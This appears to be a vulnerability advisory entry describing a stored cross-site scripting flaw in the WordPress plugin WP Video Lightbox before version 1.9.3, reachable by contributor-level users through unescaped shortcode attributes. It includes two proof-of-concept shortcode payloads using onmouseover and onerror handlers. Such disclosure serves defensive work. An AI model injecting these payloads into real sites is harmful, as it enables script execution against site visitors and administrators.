Lucene search

K
wpexploitVishnupriya Ilango WPEX-ID:42A8947F-2AE5-4F12-BD3D-AB3716501DF5
HistoryAug 23, 2021 - 12:00 a.m.

WP Video Lightbox < 1.9.3 - Contributor+ Stored Cross-Site Scripting

2021-08-2300:00:00
Vishnupriya Ilango
81

0.001 Low

EPSS

Percentile

19.4%

The plugin does not escape the attributes of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks

[video_lightbox_vimeo5 video_id='"onmouseover=alert(/XSS/) b="' width="640" height="480" anchor="Click here to open vimeo video"]

[video_lightbox_vimeo5 video_id="13562192" width="640" height="480" anchor='http"onerror=alert(/XSS/)//']

0.001 Low

EPSS

Percentile

19.4%

Related for WPEX-ID:42A8947F-2AE5-4F12-BD3D-AB3716501DF5